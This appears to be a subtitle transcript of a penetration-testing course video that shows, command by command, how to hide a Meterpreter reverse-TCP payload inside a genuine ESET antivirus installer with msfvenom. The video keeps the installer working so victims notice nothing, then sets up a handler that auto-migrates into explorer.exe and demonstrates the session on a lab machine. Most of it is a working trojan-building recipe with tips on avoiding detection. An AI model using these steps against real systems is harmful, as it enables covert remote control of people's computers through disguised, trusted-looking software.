1
00:00:00,670 --> 00:00:09,490
So typically when msfvenom runs, the payload is embedded into the default executable template at

2
00:00:09,970 --> 00:00:13,630
data/templates/template.exe.

3
00:00:14,810 --> 00:00:21,590
Although this template is changed on occasion, antivirus vendors still look for it when building signatures.

4
00:00:22,010 --> 00:00:30,050
However, msfvenom supports the use of any Windows executable in place of the default executable template.

5
00:00:31,150 --> 00:00:37,990
The important point here is you should take very good care about not disturbing the usage experience

6
00:00:37,990 --> 00:00:43,720
of the system owner or user, and the best part about it is it's extremely simple.

7
00:00:44,470 --> 00:00:48,820
So why don't we embed a Meterpreter payload in an executable?

8
00:00:49,790 --> 00:00:56,540
First off, you're going to need a Windows executable file, so you can either download one or use what you

9
00:00:56,540 --> 00:00:57,290
have already.

10
00:00:58,280 --> 00:01:06,160
So I'm just going to download the ESET NOD32 initial downloader file to embed the payload.

11
00:01:06,890 --> 00:01:10,190
So open up your browser and go to the ESET website.

12
00:01:11,080 --> 00:01:12,400
If you scroll down a little bit,

13
00:01:13,350 --> 00:01:14,900
click on the download button.

14
00:01:15,770 --> 00:01:21,590
And it will redirect you to a download page. Click on the download link and save the file.

15
00:01:23,470 --> 00:01:30,580
Now open a terminal and then type in msfvenom -p windows/meterpreter/

16
00:01:32,160 --> 00:01:33,750
reverse_tcp,

17
00:01:34,950 --> 00:01:42,000
LHOST equals 10.10.2.11, and LPORT equals 4443.

18
00:01:43,020 --> 00:01:44,190
Platform is Windows.

19
00:01:45,500 --> 00:01:47,030
Architecture, 32 bit.

20
00:01:48,160 --> 00:01:50,470
File type will be Windows executable.

21
00:01:51,500 --> 00:02:00,990
No encoding and iteration, then -x to specify a custom executable file to use as a template.

22
00:02:01,790 --> 00:02:11,360
So in my case, it is the ESET NOD32 Antivirus live installer, and -k to preserve the template file behavior

23
00:02:11,930 --> 00:02:15,110
and inject the payload as a new thread.

24
00:02:16,150 --> 00:02:18,400
So now let's give a name to the output file.

25
00:02:19,250 --> 00:02:23,720
And I'll use the same name, ESET NOD32.

26
00:02:25,340 --> 00:02:27,440
So the file is generated. ls.

27
00:02:28,630 --> 00:02:37,510
And it's here in the malware directory, and let's see the result of the file command, so it's a 32

28
00:02:37,510 --> 00:02:39,590
bit GUI Windows executable.

29
00:02:40,300 --> 00:02:47,710
Now, for the most part, when a targeted user launches a backdoored executable like this, if nothing

30
00:02:47,710 --> 00:02:50,900
appears to happen, it can raise suspicions.

31
00:02:51,370 --> 00:02:59,050
So to improve your chances of not tipping off a target, you can launch a payload while simultaneously

32
00:02:59,050 --> 00:03:03,340
continuing normal execution of the launched application.

33
00:03:04,540 --> 00:03:08,860
But for now, you just embed the payload into an executable template.

34
00:03:09,520 --> 00:03:09,970
All right.

35
00:03:09,970 --> 00:03:13,030
So now you're going to need a handler.

36
00:03:13,630 --> 00:03:18,740
So open msfconsole, and the handler template is already chosen.

37
00:03:19,330 --> 00:03:20,860
Show me the options.

38
00:03:21,860 --> 00:03:28,730
And there's nothing to change except LPORT, so set LPORT to 4443.

39
00:03:29,640 --> 00:03:36,630
But you're going to need to set another variable also, so as soon as the user launches the malware,

40
00:03:36,990 --> 00:03:39,320
you need to jump to another reliable process.

41
00:03:39,900 --> 00:03:46,370
So let's see, in our case, you're going to do this, but you can also do something else.

42
00:03:47,370 --> 00:03:48,990
So show advanced.

43
00:03:49,840 --> 00:03:53,380
And here's a variable, AutoRunScript.

44
00:03:54,760 --> 00:04:01,960
So this variable specifies what to do first if the exploitation is accomplished.

45
00:04:02,470 --> 00:04:08,020
So in other words, in this particular scenario, you're going to need to migrate to a reliable process.

46
00:04:08,440 --> 00:04:12,490
So then that means set AutoRunScript to

47
00:04:13,400 --> 00:04:18,140
post/windows/manage/migrate

48
00:04:19,410 --> 00:04:30,720
with the parameters NAME equals explorer.exe and SPAWN equals false.

49
00:04:31,380 --> 00:04:37,250
So then after exploitation, the script will run and migrate to explorer.exe.

50
00:04:38,310 --> 00:04:41,070
OK, then let's hit exploit -j.

51
00:04:42,110 --> 00:04:44,120
Go back over to Metasploitable 3.

52
00:04:45,880 --> 00:04:49,390
Refresh the page and then download it and save it,

53
00:04:49,420 --> 00:04:52,150
the ESET NOD32 file, to the desktop.

54
00:04:53,870 --> 00:04:57,590
And there's the file, so let's double-click it and launch it.

55
00:04:59,440 --> 00:05:05,620
So did you see that? The session opened, and immediately upon opening the session, the post module is

56
00:05:05,620 --> 00:05:10,840
executed, so there we have it, we've successfully migrated to explorer.

57
00:05:11,800 --> 00:05:13,060
So sessions.

58
00:05:14,430 --> 00:05:16,080
Interact with session five.

59
00:05:17,430 --> 00:05:20,100
getuid, sysinfo.

60
00:05:21,030 --> 00:05:24,270
And yes, this is what you want.

61
00:05:25,720 --> 00:05:28,750
Now, unless a user closes the computer,

62
00:05:29,680 --> 00:05:31,600
you can move around anywhere you want.